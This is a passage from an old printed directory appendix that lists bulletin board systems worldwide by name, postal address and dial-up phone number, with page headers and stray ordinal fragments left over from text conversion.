Camarillo CA 93010 + BBS Phone: 805-987-5506 + + Bill's BBS + Address: 9512 Dongate Ln, Knoxville TN 37931 + BBS Phone: 615-694-8757 + + Bits N' Bytes BBS + Address: PO Box 8194, Winslow ME 04901 + BBS Phone: 207-873-1937 + + Bluegrass RBBS + Address: 686 Sheridan Dr, Lexington KY 40503-1726 + BBS Phone: 606-272-0499 + + BlueMax + Address: 213 Bessborough Ave, Moncton NB E1E 1R3 CANADA + BBS Phone: 506-382-9220 + + Boardwalk BBS + Address: 520 University Ave Ste 110C, Madison WI 53703 + BBS Phone: 608-257-0486 + + Boardwatch Magazine BBS + Address: 5970 South Vivian Street, Littleton CO 80127 + BBS Phone: 303-973-4222 + + Borderquest BBS + th + Address: #1430,700 4 Ave SW, Calgary AB T2P 3J4 CANADA + BBS Phone: 403-262-5095 + + BorderTown BBS + Address: 332 East Main ST, Westminster MD 21157 + BBS Phone: 410-876-5101 + + Buller BBS + Address: Angelholmsvagen 76, 26937 Bastad, SWEDEN + BBS Phone: 46-431-70909 + + Business Solutions BBS + Address: Box 358, RPO University, Saskatoon SK S7N 4J8 CANADA + BBS Phone: 306-653-1664 + + Appendix C, "Bulletin Boards" 810 + + + + C.C.N. + Address: 1725 W Burlington Place, Denver CO 80221-1059 + BBS Phone: 303-477-0356 + + Cadmos / CHAOS + Address: Skoufa 26, Athens 106 73 GREECE + BBS Phone: 301-360-6044 + + Cape Fear BBS + Address: 1140 Sloop Point Rd, Hampstead NC 28443-8640 + BBS Phone: 910-270-3174 + + Capitol Area Network + Address: 10829 Golf Course Terrace, Mitchellville MD 20721 + BBS Phone: 301-499-4671 + + Cappuccano Cafe + Address: 2624 E Mendota Drive, Boise ID 83705-6873 + BBS Phone: 208-467-4110 + + CATS-BBS + Address: Rua Carlos Jose Barreiros,6 Cv, Lisbon 1000 PORTUGAL + BBS Phone: 351 1-846-2422 + + CBUG BBS + Address: PO BOX 125, COLUMBIA MD 21045 + BBS Phone: 301-750-1253 + + Central Europe BBS + Address: Hansastr. 25, Furth D-90766 GERMANY + BBS Phone: 49-911-97344-44 + + Channel 1 Communications + Address: PO BOX 338, Cambridge MA 02238 + BBS Phone: 617-354-3230 + + Channel V + Address: PO Box 5320, Herzelyia 46152 ISRAEL + BBS Phone: 972-9-503801 + + Charleston Communications Inc. + Address: PO Box 85178, Las Vegas NV 89185-0178 + BBS Phone: 702-386-7979 + + ChatterBox + Address: 26 Cygnet Close, Larkfield AylesFord KENT ME20 6QH + U.K. + BBS Phone: 44 732-870941 + + Chicago Syslink + Address: 1643 SOUTH GUNDERSON AVE, BERWYN IL 60402 + BBS Phone: 708-795-4442 + + Appendix C, "Bulletin Boards" 811 + + + + Chip -N- Disk BBS + Address: PO Box 89, Trevor WI 53179-0089 + BBS Phone: 414-862-6221 + + Classified Connection + Address: PO Box 50047, San Diego CA 92165 + BBS Phone: 619-566-5516 + + Clavius + Address: C/ Francos Rodriquez 42,20, Madrid 28039 SPAIN + BBS Phone: 34-1-3112371 + + Cliffside BBS + Address: PO Box 215, Cliffside NC 28024 + BBS Phone: 704-657-4154 + + Cliffside Park BBs + Address: 141 Gaisler Road, Blairstown NJ 07825 + BBS Phone: 908-362-6907 + + CLUB PC BBS + Address: 1217 Crescent Drive, Smithfield VA 23430 + BBS Phone: 804-357-0357 + + Collector's Edition + Address: 3733 Rockdale Dr, Dallas TX 75220-1863 + BBS Phone: 214-351-9859 + + Colligatarch Authority + Address: 3392 E US-2, Iron River MI 49935 + BBS Phone: 906-265-0037 + + ComPart BBS + Address: Takomotie 11, HELSINKI FIN 00380 FINLAND + BBS Phone: 358 0 506 3329 + + CompuBasix + Address: PO Box 8169, Corpus Christi TX 78468-8169 + BBS Phone: 512-994-8300 + + CompuServe PCNet-Online + Address: 1705 Barclay Drive, Austin TX 78746 + + Computer Junction + Address: 212 Browning Ave, Elizabeth NJ 07208 + BBS Phone: 908-354-6979 + + Computer Link + Address: 5150 Dundas Street West #306, Etobicoke ON M9A 1C3 + CANADA + BBS Phone: 416-233-5410 + + Appendix C, "Bulletin Boards" 812 + + + + Computer Support Hot-Line + th + Address: 3805 9 St, Des Moines IA 50313-3342 + BBS Phone: 515-246-1353 + + Computer Users Exchange (CUE) + Address: 1710 SW 33ST, Topeka KS 66611-2504 + BBS Phone: 913-267-1903 + + Computrol BBS + Address: PO Box 281, Hornsby NSW 2077 AUSTRALIA + BBS Phone: 61-2-489-6848 + + Connect Ireland + Address: 20 Mark Street, Dublin 2 IRELAND + BBS Phone: 353-1-6711687 + + Construction Net #6 + Address: PO Box 1418, Los Alamos NM 87544 + BBS Phone: 505-662-0659 + + Conway PC Users Group BBS + Address: PO BOX 10442, Toadsuck Station, Conway AR 72032 + BBS Phone: 501-329-7227 + + County Seat BBS + Address: 105 N River Road # 111, Mt Clemens MI 48043-1927 + BBS Phone: 810-468-2625 + + CRIS + st + Address: 400 41 St, Bay City MI 48708 + BBS Phone: 517-895-0510 + + Crossroads, BBS + Address: PO Box 1022, Lexington SC 29071-1022 + BBS Phone: 803-957-7077 + + Crystal Mountain BBS + Address: 402 Chestnut Hill Ave, Athol MA 01331 + BBS Phone: 508-249-2156 + + CyberCity BBS + Address: 219 Du Vallon, Aylmer QB J9J 1N9 CANADA + BBS Phone: 819-684-8232 + + Cyberia Communications, Inc + Address: One Market Way East, York PA 17401 + BBS Phone: 717-848-1666 + + Dagan Software BBS + Address: 8130 Dagan St, Anchorage AK 99502 + BBS Phone: 907-248-8130 + + Appendix C, "Bulletin Boards" 813 + + + + Darin + Address: PO Box 202, Qatif 31911, SAUDI ARABIA + BBS Phone: 966-3-855-2131 + + Data-Base BBS + Address: 3 Grandin Drive, Annandale NJ 08801-3346 + BBS Phone: 908-735-2180 + + Dataland BBS + Address: 7303 Hana Rd, Edison NJ 08817 + BBS Phone: 908-572-5762 + + DataLynx BBS + Address: Capri Electronics Corp, PO Box 589, Bayfield CO + 81122-0589 + BBS Phone: 970-884-6001 + + Deep Cove BBS + Address: PO Box 45504, Sunnyside Mall PO, Surrey BC V4A 9N3 + CANADA + BBS Phone: 604-536-5885 + + Del Ches Systems BBS + Address: 11 Andover Drive, Exton PA 19341 + BBS Phone: 610-363-6625 + + Destination CPU + Address: PO Box 906, Elmira NY 14902-0906 + BBS Phone: 607-737-6901 + + DFG Financial BBS + Address: PO Drawer 4006, 606 North Eighth Street, Opelika AL + 36803-4006 + BBS Phone: 334-745-0579 + + Direct Connect + Address: PO Box 6684, Philadelphia PA 19149 + BBS Phone: 215-535-1917 + + DR. SNED'S RBBS-IN-A-BOX + Address: RT # 1 BOX 232, San Mateo FL 32187-9801 + BBS Phone: 904-325-6558 + + DreamLine II BBS + Address: 10 Pleasant Rd, Norristown PA 19401 + BBS Phone: 610-279-2760 + + DSC BBS + Address: 17 Richard Rd, Ivyland PA 18974-1512 + BBS Phone: 215-443-9434 + + DTEL + Address: 1832 North DuPont Highway, Dover DE 19901 + BBS Phone: 302-739-2818 + + Appendix C, "Bulletin Boards" 814 + + + + Electro-Technika + Address: P.O. Box 8210, Colorado Springs CO 80933-8210 + BBS Phone: 719-380-0541 + + EmmaSoft Software Company, Inc + Address: PO BOX 238, LANSING NY 14882-0238 + BBS Phone: 607-533-7072 + + Europa BBS + Address: Nicolasa Gomez, 80 B, 28022 MADRID SPAIN + BBS Phone: 34-1-320-8460 #2 + + Event Horizons + th + Address: 530 4 St #B, Lake Oswego OR 97034-3006 + BBS Phone: 503-697-5100 + + Evergreen BBS + Address: 104 Evergreen Ave, Hopatcong NJ 07843 + BBS Phone: 201-398-2373 + + Excalibur + Address: 36450 Farmbrook Drive, Bldg 51, Clinton Township MI + 48035 + BBS Phone: 810-792-9078 + + Exec-PC + th + Address: 2105 S 170 Street, New Berlin WI 53151 + BBS Phone: 414-789-4210 + + Express Net + Address: 11155 Wilshire Chase Drive, Duluth GA 30136 + BBS Phone: 404-410-9139 + + Family-Net bbs + Address: 11693 N. Shore Drive Apt 22C, Reston VA 22090 + BBS Phone: 703-787-6708 + + Fantasy Land + Address: 2404 South Sixth, Springfield IL 62703 + BBS Phone: 214-535-1005 + + File World BBS + Address: PO Box 901, Georgetown KY 40324 + BBS Phone: 502-867-1800 + + Flix Pages & Tunes + Address: 4 Briar Lane, Weston MA 02193-1465 + BBS Phone: 617-235-0789 + + Full Connection BBS + Address: Caixa Postal 108, Santo Andre - SP BRAZIL + BBS Phone: 011 440 7204 + + Appendix C, "Bulletin Boards" 815 + + + + Games R' Us + Address: 1314 Sycamore Street, Norman OK 73072 + BBS Phone: 405-447-7954 + + Gateway Online + Address: PO Box 82, Rockwood MI 48173 + BBS Phone: 313-297-5571 + + Gateway Software BBS + Address: 1230 Market Street Ste 402, San Francisco CA 94102 + BBS Phone: 415-885-1392 + + GEnie IBM R/T + Address: 100 Bleecker St #19E, New York NY 10012 + BBS Phone: 800-638-9636 + + GeoFract BBS + Address: 17729 Devall Road, Spencerville IN 46788-9202 + BBS Phone: 219-627-3309 + + Geowiz + Address: PO Box 540, Toormina NSW 2452 AUSTRALIA + BBS Phone: 066-584-396 + + GLIB + Address: PO BOX 636, ARLINGTON VA 22216 + BBS Phone: 703-578-4542 + + HACOM BBS + Address: A.Blankaartsingel 113, Amersfoort 3813-PA NETHERLANDS + BBS Phone: 31-33-803610 + + HAL 9000 BBS + Address: 5145 Pontiac Trail, Ann Arbor MI 48105-9627 + BBS Phone: 313-663-4173 + + Hamster BBS + Address: ZIMMERSTRASSE 9, 58638 ISERLOHN GERMANY + BBS Phone: 49 237114490 + + HAWG WILD! BBS, INC. + Address: PO BOX 540691, OMAHA NE 68154 + BBS Phone: 402-493-2737 + + Hawk's Castle + Address: 61 Juniper, Birch Hill, Bracknell BERKS RG12 7ZF U.K. + BBS Phone: 344 411621 + + Hermes Center BBS + Address: Boite Postale N.3, Quincy Sous Senart 91480 FRANCE + BBS Phone: 331 69007672 + + Appendix C, "Bulletin Boards" 816 + + + + Hogard Software Solutions + Address: 4533 Marblearch Dr, Grand Prairie TX 75052 + BBS Phone: 214-641-6292 + + Hollywood News/Info System + Address: PO Box 366, Hollywood MD 20636 + BBS Phone: 301-373-3530 + + Horse Feathers BBS + Address: 35123 Ravine Ln, Ingleside IL 60041 + BBS Phone: 708-587-9214 + + Hottips BBS Glendale + Address: PO Box 764, La Canada CA 91012 + BBS Phone: 818-248-3088 + + HouseNet BBS + Address: PO Box 520, St Michaels MD 21663 + BBS Phone: 410-745-2037 + + HSX Support Groups + Address: 132 Hutchin Hill Rd, Shady NY 12409 + + Hubert Middle School + Address: 768 Grant Street, Savannah GA 31499 + BBS Phone: 912-651-5632 + + HUG & Lincoln Software + Address: 1136 SUNNYSIDE DRIVE, HAGERSTOWN MD 21742-3044 + BBS Phone: 301-733-6456 + + Icaro BBS + Address: c/o Luis de Salazar, 9 5C, MADRID 28002 SPAIN + BBS Phone: 011-34-1-519-4645 + + iLink Information Service + Address: Flt D, 20/F, Blk 6, Phase 2, Belvedere Garden, TSUEN + WAN HONG KONG HONG KONG + BBS Phone: 852-611-9399 + + Impact! Online + Address: 8855 SW Brabham Way, Gaston OR 97119 + BBS Phone: 503-985-3408 + + INFO-CENTER BBS + Address: De Hassels 2, B-2400 MOL BELGIUM + BBS Phone: 32 14 311 455 + + Infonet Services + Address: Bally Curreen Estate, Kinsale Road, CORK IRELAND + BBS Phone: 353-21-310170 + + Appendix C, "Bulletin Boards" 817 + + + + Bazan, Carlos + Address: APDO POSTAL 105-60, Mexico City CP 11581 MEXICO + BBS Phone: 525-525-3732 + + Inter-Connexions + Address: 123, rue Valin, Hull QC J8Y 4W3 CANADA + BBS Phone: 819-776-0088 + + Interact BBS + Address: Blk 228 Pasir Ris St 21, #09-08, Singapore 1851 + SINGAPORE + BBS Phone: 65 581 7024 + + Intercity BBS + Address: 4615 PATTERSON AVE, RICHMOND VA 23226-1341 + BBS Phone: 804-353-4160 + + JADE + Address: 416 Colby Ct, Janesville WI 53546 + BBS Phone: 608-757-3000 + + JAPCUG + Address: 1804 Chapin St, Jackson MI 49203-1804 + BBS Phone: 517-789-7556 + + JBJ Systems PC Board BBS + Address: 1549 Methyl Street, Pittsburgh PA 15216 + BBS Phone: 412-341-9323 + + Jezebel's Parlour BBS + Address: 276 Pleasant Hill Rd, Flanders NJ 07836 + BBS Phone: 201-927-2932 + + Jims' PC Paradise + Address: 87-26 56 Avenue, Elmhurst NY 11373 + BBS Phone: 718-458-0502 + + JIX BBS + Address: 2-7-12 Higashi-Tenma, KITA-KU OSAKA 530 JAPAN + BBS Phone: 06 351-6074 + + JUPITER BBS + Address: PO BOX 935, JUPITER FL 33468-0935 + BBS Phone: 407-575-3853 + + Just Programs BBS + Address: 313 West Webster Ave, Roselle Park NJ 07204 + BBS Phone: 908-298-9098 + + KBTC BBS + Address: 407 SOUTH HILBORN AVE, WEST COVINA CA 91791 + BBS Phone: 818-967-0701 + + Appendix C, "Bulletin Boards" 818 + + + + Kitty's Cafe! BBS + Address: PO Box 604843, Flushing NY 11360 + BBS Phone: 718-352-4194 + + Knight Light PCB BBS + Address: Hugoverrieststraat 34, Pl Tilburg 5044 NETHERLANDS + BBS Phone: 31-13-678227 + + Knightec BBS + Address: 35 Rorb Blvd #6, Orangeville ON L9W 3L1 CANADA + BBS Phone: 519-940-0007 + + Koeltz Scientific Books USA + Address: 1911 North Duncan Road, Champaign IL 61821 + BBS Phone: 217-355-4532 + + KSI Public BBS + Address: 305 N Walnut St, PO Box 395, Walton IN 46994 + BBS Phone: 219-626-2150 + + L.I.N.E. + Address: PO Box 19, Greenlawn NY 11740 + BBS Phone: 516-261-9701 + + Lakeside Wildcat! BBS + Address: 9717 Caraway Court, Lakeside CA 92040-4225 + BBS Phone: 619-390-7328 + + Last Chance TBBS + Address: PO Box 2536, Universal City TX 78148 + BBS Phone: 210-822-7519 + + Late Nite DIVERSIONS + Address: #2-1200 London Road Ste 241, Sarnia ONT N7V 2B9 + CANADA + BBS Phone: 519-332-0241 + + Lighthouse BBS + Address: 500 NORTHGATE DR, DYER IN 46311 + BBS Phone: 219-864-1066 + + Live Wire BBS + Address: C-503, Eden-4, Hiranandani Garden, Powai, Bombay + 400076 INDIA + BBS Phone: 91-22-5787812 + + Live Wire BBS Calcutta + Address: C/O M.L. Khemka & Sons, 4 Floor,6OLD Post Office St, + Calcutta - 1 INDIA (W.B.) + BBS Phone: 33-2481356 + + Appendix C, "Bulletin Boards" 819 + + + + Long's Peak BBS + th + Address: 1820 17 Ave, Longmont CO 80501 + BBS Phone: 303-772-7921 + + LoperNet BBS + Address: 311 West 11th Street, PO Box 1004, Kearney NE + 68848-1004 + BBS Phone: 308-234-2247 + + Magpie BBS + Address: 301 East Main St, CROTHERSVILLE IN 47229 + BBS Phone: 812-793-2237 + + Mainstreet Online + Address: 502 Fontanelle Ct, San Jose CA 95111-1712 + BBS Phone: 408-224-7523 + + mAp/LZ + Address: 6049 Dwight, Dearborn Hgts MI 48127 + BBS Phone: 313-563-8940 + + McBaud! BBS + Address: Adenauerlaan 84, 3137 JA Vlaardingen, NETHERLANDS + BBS Phone: 31 10-4752961 + + Media Concept BBS + Address: RUE DE SAINT LEGER 40, LUSTIN B-5170 BELGIUM + BBS Phone: 011 32 411300 + + MegaSystem + Address: 1335 Greg St Ste 103, Sparks NV 89431 + BBS Phone: 702-359-2666 + + Mercury Opus + Address: 4301 11th Avenue N, St Petersburg FL 33713-5207 + BBS Phone: 813-321-0734 + + MetroPitt BBS + Address: 125 John Giel Drive, Glenshaw PA 15116-2803 + BBS Phone: 412-487-9223 + + Micro Message Service (MMS) + Address: 1464 Garmer Station Blvd, Suite 100, Raleigh NC 27603 + BBS Phone: 919-779-6647 + + Microlink D + Address: 12244 Applewood Knolls Dr, Lakewood CO 80215 + BBS Phone: 303-237-8575 + + MicroMetric Support BBS + Address: 98 Dade Ave, Sarasota FL 34232-1609 + BBS Phone: 813-371-2490 + + Appendix C, "Bulletin Boards" 820 + + + + MidEast Connection BBS + Address: PO Box 56496, Riyadh 11554 SAUDI ARABIA + BBS Phone: 966 1-441-0075 + + Midwest Data Exchange + Address: 119 S Main, Aberdeen SD 57401 + BBS Phone: 605-226-2428 + + MindWare Online + Address: PO Box 365, Berkeley CA 94701 + BBS Phone: 510-843-8071 + + Mortgage Market On-Line + Address: 53 E St Charles Rd, Villa Park IL 60181 + BBS Phone: 708-834-1450 + + Mr Wonderful's Lair + Address: 670 South Anderson St, Los Angeles CA 90023 + BBS Phone: 213-261-8055 + + MSmac BBS + Address: Rua Princesa Benedita n-4 1-dr, Torres Vedras 2560 + PORTUGAL + BBS Phone: 351-61-314336 + + MSN Shareware Forum + th + Address: 2526 69 Ave S, St Petersburg FL 33712-5631 + + MultiServer + Address: Schubertstraat 38, 8031 ZE Zwolle NETHERLANDS + BBS Phone: 31-38-541358 + + MultiSystem TBBS + Address: 2524 ELMDALE DRIVE, CINCINNATI OH 45230-1213 + BBS Phone: 513-231-7013 + + Multiverse + th + Address: 1965 East 6 St Ste 610, Cleveland OH 44114 + BBS Phone: 216-644-6776 + + Murphy BBS + Address: Carrer Nou, 57 Atic, 08291 Ripollet (BCN) 08291 SPAIN + BBS Phone: 34-3-580-85-15 + + My Computer Company + Address: PO Box 99, 25 Albert St, Erskineville NSW 2043 + AUSTRALIA + BBS Phone: 612-565-1044 + + My Home BBS! + Address: PO Box 16203, Augusta GA 30919-2203 + BBS Phone: 706-733-1124 + + Appendix C, "Bulletin Boards" 821 + + + + NAFI On-line + Address: PO Box 957257, 2155 Stonington Ave # 118, Hoffman + Estates IL 60194 + BBS Phone: 708-885-9305 + + NCS Cape Town + Address: 57 Bedford St, Parow CAPE TOWN 7500 SOUTH AFRICA + BBS Phone: 27-21-930-4654 + + Networking BBS + Address: Zoss Communications Inc, 714 East La Salle Avenue, + South Bend IN 46617 + BBS Phone: 219-288-1402 + + New Horizons BBS + Address: 12627 Kornett Lane, Bowie MD 20715 + BBS Phone: 301-805-8910 + + Nice Day BBS + Address: Lerchenstrasse 15, 4132 Muttenz SWITZERLAND + BBS Phone: 41-61-463-0321 + + Night Dream BBS + Address: Naestvedvej 24, VORDINBORG DK-4760 DENMARK + BBS Phone: 45 55340404 + + Night Voyager BBS + Address: E 16406 20TH CT, Veradale WA 99037 + BBS Phone: 509-926-1686 + + Nite-Air BBS System + Address: RD 2, Box 457, Bartlett Road, Rome NY 13440 + BBS Phone: 315-339-8831 + + NJ Computer Connection + Address: PO BOX 6909, Lawrenceville NJ 08648 + BBS Phone: 609-895-0398 + + NJPCUG + Address: PO BOX 14, Paraums NJ 07653-0014 + BBS Phone: 201-835-3122 + + Node Dakota BBS + Address: 1911 San Diego Dr, Bismarck ND 58504-7222 + BBS Phone: 701-224-1431 + + NORDIC Enterprises EDMS + Address: PO BOX 509, Ipswich MA 01938 + BBS Phone: 508-356-1166 + + Northern Computer Services + Address: PO Box 45, Glenroy Melborne VIC 3046 AUSTRALIA + BBS Phone: 61-3-306-5130 + + Appendix C, "Bulletin Boards" 822 + + + + Northern Exposure + Address: 43 Primrose Crescent, Fulwell SUNDERLAND SR6 9RJ + ENGLAND + BBS Phone: 44 91-548-0892 + + Nucleus Information Service + th + Address: 1835 B 10 Ave SW, Calgary Alberta T3C 0K2 CANADA + BBS Phone: 403-541-9400 + + OBSdata-BBS + Address: Nuevo Chilches 3 Nr.5, Chilches-Malaga 29760 SPAIN + BBS Phone: 34-95-251-4228 + + OMEGA-ONE BBS + Address: PO Box 1416, Corinth MS 38834-1416 + BBS Phone: 601-287-1336 + + Online Systems of Canada + Address: 383 Richmond Street, Ste 900, London ON N6A 3C4 + CANADA + BBS Phone: 519-642-0700 + + Opus Networx + th + Address: PO Box Int'l #4N-1223, 8340 NW 56 Street, Miami FL + 33166 + BBS Phone: 809-628-5023 + + OTB Communication System + Address: 14-121 Ripley Court, Oakville ON L6H 1H2 CANADA + BBS Phone: 905-844-2483 + + Our Town OnLine + Address: 240 Clipper Way, Seal Beach CA 90740 + BBS Phone: 310-799-8553 + + P & A BBS + Address: 302 Bellwins 1367-23, Nakagami Akishima TOKYO 196 + JAPAN + BBS Phone: 81 425-46-9143 + + P&G Enterprises + Address: 1106 Oak, Duncan OK 73533 + BBS Phone: 405-255-6897 + + Pacific Rim Information + Address: 4580 Mt Alifan Drive, San Diego CA 92111-2504 + BBS Phone: 619-278-7361 + + Panama ShareWare + Address: 8501 N Logoon #307, PANAMA CITY BEACH FL 32408 + BBS Phone: 904-235-3634 + + Appendix C, "Bulletin Boards" 823 + + + + PC PULSE + Address: PO Box 2265, BRENERTON WA 98310 + BBS Phone: 206-377-8508 + + PC Shop + Address: 37 Jalan Silang, Kuala Lumpur 50050 MALAYSIA + BBS Phone: 603-957-4373 + + PC-Cubed + Address: 35 Charit Way, Rochester NY 14626-1101 + BBS Phone: 716-723-8489 + + PC-DSD Direct Access BBS + Address: 1254 Elden Ave, Los Angeles CA 90006 + BBS Phone: 213-384-0809 + + PC-Monitor + th + Address: PO Box 5, 305 East 6 St, Albert Lea MN 56007 + BBS Phone: 507-373-1100 + + PC-Ohio + Address: 23749 CEDAR ROAD, CLEVELAND OH 44122-1069 + BBS Phone: 216-381-3320 + + Peace Connection BBS + Address: Franciscan Friars, 329 Poplar at Cedar Sts, Hazard KY + 41701-1541 + BBS Phone: 606-439-1743 + + Pennsylvania OnLine! + Address: PO Box 6501, Harrisburg PA 17112 + BBS Phone: 717-657-8699 + + Pistonhead + Address: 2115 Lennox Rd, Richmond VA 23228-6038 + BBS Phone: 804-262-4036 + + PJ Systems + Address: 7290 Britton Hwy, Britton Mi 49229 + BBS Phone: 517-451-2072 + + Po' Boy's BBS + Address: 4533 Beth Manor Dr Apt B, Montgomery AL 36109 + BBS Phone: 205-271-3545 + + Prime Cut BBS + Address: 13 Kirkbrae Drive, Lincoln RI 02865-1007 + BBS Phone: 401-334-3096 + + Prime Time BBS + Address: PO Box 6997, BURBANK CA 91510 + BBS Phone: 818-982-7271 + + Appendix C, "Bulletin Boards" 824 + + + + PrometheuS + Address: via Podgora 132, 70124 Bari ITALY + BBS Phone: 39-80-551-5278 + + Psychobabble + Address: 481 Cypress Lane J-179, Greenville MS 38701 + BBS Phone: 601-332-9453 + + PUMA Wildcat! + Address: PO BOX 13231, Alexandria LA 71315 + BBS Phone: 318-443-1065 + + Puss N Boots + Address: PO Box 832556, Richardson TX 75083 + BBS Phone: 214-437-0688 + + QuickSilver + Address: D&R Enterprises, PO BOX 94318-503, Las Vegas NV + 89193-4318 + BBS Phone: 702-384-8503 + + R.B. Enterprises + th + Address: 711 East 134 Street, Bradenton FL 34202 + BBS Phone: 813-748-5380 NP + + RadioComm + Address: PO Box 633, Park Ridge IL 60068 + BBS Phone: 708-518-8336 + + Rama One BBS + th + Address: 73-35 70 Street, Glendale NY 11385 + BBS Phone: 718-366-6165 + + Rapid River BBS + Address: 6848 Highway 34, Rudolph WI 54475-9531 + BBS Phone: 715-435-3855 + + Real Estate Online + Address: 710 Main St, Huntington Beach CA 92648 + BBS Phone: 714-969-9624 + + Real Exposure + th + Address: 121 W 27 St Ste 703A, New York NY 10001 + BBS Phone: 212-691-2679 + + RunWay BBS + Address: PO Box 0941, Lansdowne PA 19050 + + Sable OnLine! + Address: PO Box 5011, Gardena CA 90249-5011 + BBS Phone: 310-768-8362 + + Appendix C, "Bulletin Boards" 825 + + + + Sac BBS + Address: Eset s.r.o. Ondavska 3, 826 47 Bratislava SLOVAKIA + BBS Phone: 42-7-204-8232 + + Sales Automation Success! + Address: 2815 NW Pime Cone Drive, Issaquah WA 98027-8698 + BBS Phone: 206-392-8943 + + Seascape! BBS + Address: PO BOX 326, MOREHEAD CITY NC 28557 + BBS Phone: 919-726-9364 + + Servant of the Lord + Address: 6113 W RIVER ROAD, MATOACA VA 23803-8047 + BBS Phone: 804-590-2161 + + SFE Systems BBS + Address: PO Box 4655, Huntsville AL 35815 + BBS Phone: 205-650-0107 + + Shadow's Palace BBS + Address: 11501 NE 11th Place, Biscayne Park FL 33161 + BBS Phone: 305-895-4688 + + Sharpenit! RBBS + Address: 65 Valentine Street, Agawam MA 01001 + BBS Phone: 413-786-4706 + + Sigma Industries BBS + Address: 800 S. Main St, Lakeport CA 95453 + BBS Phone: 707-263-8582 + + SIGMA IOTIA RBBS + Address: 4006 Desert Drive, Pasco WA 99301 + BBS Phone: 509-965-0467 + + Silicon Tundra BBS + Address: PO Box 97, Munster Hamlet ON KOA 3PO CANADA + BBS Phone: 613-838-4684 + + Skip's Doghouse BBS + Address: 621 Big Horn Dr, O'Fallom MO 63366-6944 + BBS Phone: 314-240-7547 + + Alves, Miguel Lupi + Address: Estrada da Luz 161-31Dto, Lisboa 1600 PORTUGAL + BBS Phone: 351 1 7269042 + + SkyWatch + Address: 2667 Rothwell St, Regina SK S4N 2E2 CANADA + BBS Phone: 306-569-0581 + + Appendix C, "Bulletin Boards" 826 + + + + Software Creations + Address: 26 Harris Street, Clinton MA 01510 + BBS Phone: 508-365-2359 + + SOM Premium Info Network + Address: 269 WAUKENA AVE, OCEANSIDE NY 11572-4335 + BBS Phone: 516-536-8723 + + Southern Star BBS + Address: c/o Axonn Corp #202, 101 W Robert E Lee Blvd, New + Orleans LA 70124 + BBS Phone: 504-885-5928 + + Southwest BBS + Address: PO Box 70062, Pasadena CA 91117-7062 + BBS Phone: 818-285-8684 + + Space BBS + Address: PO BOX X, MENLO PARK CA 94026 + BBS Phone: 415-323-4193 + + Squirrel's Nest + Address: 1250 E BLUFF ST, MARSEILLES IL 61341 + BBS Phone: 815-795-6371 + + St Louis Users Group BBS + Address: 12365 Maverick Drive Apt F, Maryland Heights MO 63043 + BBS Phone: 314-878-7614 + + Starlight + Address: PO Box 15752, Seattle WA 98115 + BBS Phone: 206-782-3221 + + Starview Communications + Address: 448 N Cedar Bluff Rd #316, Knoxville TN 37923 + BBS Phone: 615-531-8892 + + Stimpy's Sandbox + Address: 613 Herman Ave, Lemoyne PA 17043 + BBS Phone: 717-730-8504 + + Stingray, Stingray II + Address: 534 W Cromwell Ave, Clovis CA 93611 + BBS Phone: 209-434-4215 + + STSI + Address: PO Box 297, Bertha MN 56437 + BBS Phone: 218-924-2060 + + Sudden Impact + Address: 1011 S Armstrong, Kokomo IN 46902 + BBS Phone: 317-457-5957 + + Appendix C, "Bulletin Boards" 827 + + + + Sunset Ridge BBS + th + Address: 9320 S 54 Court, Oak Lawn IL 60453 + BBS Phone: 708-636-0971 + + Superior Shareware + Address: PO Box 26005, Thunder Bay ON P7E 2M0 CANADA + BBS Phone: 807-475-3099 + + Support U. + Address: 11221 Manchester Rd # 313, St Louis MO 63122-1122 + BBS Phone: 314-984-8387 + + SYNAPSE BBS + Address: 22 Beloeil, Gatineau QB J8T 7G3 CANADA + BBS Phone: 819-561-4321 + + Systems Engineering + Address: 13 Orchard Rd, South Hamilton MA 01982-1417 + BBS Phone: 508-927-2505 + + T-8000 Information System + Address: 3324 49TH STREET SW, CALGARY AB T3E 3Y3 CANADA + BBS Phone: 403-246-4487 + + T.I.F.S.D.B. China-Link + Address: 636 Coral Reef Drive, Galthersburg MD 20878 + BBS Phone: 301-975-9794 USA + + TechNet BBS + Address: Dynamic Learning Systems, PO BOX 805, MARLBORO MA + 01752 + BBS Phone: 508-366-7683 + + Techno-Babble + Address: 29550 High Meadow, Farmington Hills MI 48334 + BBS Phone: 810-737-2912 + + Ten Forward + Address: PO Box 813, Port Angeles WA 98362 + BBS Phone: 206-452-7681 + + TESS + Address: Fuuthof 21, PO BOX 85332, 3508 AH UTRECHT NETHERLANDS + BBS Phone: 31-30-522171 + + Texada Graphic Windows + Address: PO Box 1 Van Anda, Texada Island BC V0N 3K0 CANADA + BBS Phone: 604-486-7229 + + The 8-Bit Corner + Address: 1297 Lakeshore Drive, Muskegon MI 49441 + BBS Phone: 616-755-3013 + + Appendix C, "Bulletin Boards" 828 + + + + The Albuquerque ROS + Address: PO Box 13150, Albuquerque NM 87192-3150 + BBS Phone: 505-296-3000 + + The Atomic Cafe BBS + Address: PO Box 720894, Houston TX 77072 + BBS Phone: 713-530-8875 + + The Baud Room BBS + Address: PO BOX 254, Clifton Hill VIC 3068 AUSTRALIA + BBS Phone: 613-481-8022 + + The Bee Line + Address: 26 Elizabeth Street, Orangeville ON L9W 1C1 CANADA + BBS Phone: 519-940-4990 + + The Big Byte + Address: 609 Rogers St., Rockwell NC 28138 + BBS Phone: 704-279-2295 + + The BixBox + Address: PO BOX 75, Chatham KENT ME5 9DL ENGLAND + BBS Phone: 44 0 1634-200931 + + The Black Cauldron + Address: 704 Highgate Dr, Winter Springs FL 32708 + BBS Phone: 407-699-6613 + + The Black Gold BBS + Address: 18252 E 90 N, Owasso OK 74055 + BBS Phone: 918-272-7779 + + The Blue Ridge Express + Address: PO BOX 34446, Richmond VA 23234 + BBS Phone: 804-790-1675 + + THE BOARD + Address: 2828 Cochran St #271, Simi Valley CA 93065 + BBS Phone: 818-366-8874 + + The Bobcat BBS System + Address: 100 Anthony Road #05-100, Cairnhill Garden, Singapore + 0922 SINGAPORE + BBS Phone: 65-738-2509 + + THE BOSS + Address: 206 County Road, Tenafly NJ 07670 + BBS Phone: 201-568-7293 + + The Break RBBS + Address: 4660 WHITAKER PL, DALE CITY VA 22193-3011 + BBS Phone: 703-680-9269 + + Appendix C, "Bulletin Boards" 829 + + + + The Bytes 'n Bits BBS + Address: P.O. Box 3320, Bayonne N.J. 07002 + BBS Phone: 201-437-4355 + + The Casino Bulletin Board + Address: PO Box 451, Pomona NJ 08240-0451 + BBS Phone: 609-485-2380 + + The Cat Eye + Address: Route 1 Box 184, Shinnston WV 26431 + BBS Phone: 304-592-3390 + + The Chicago Game Zone! + Address: 3001 S 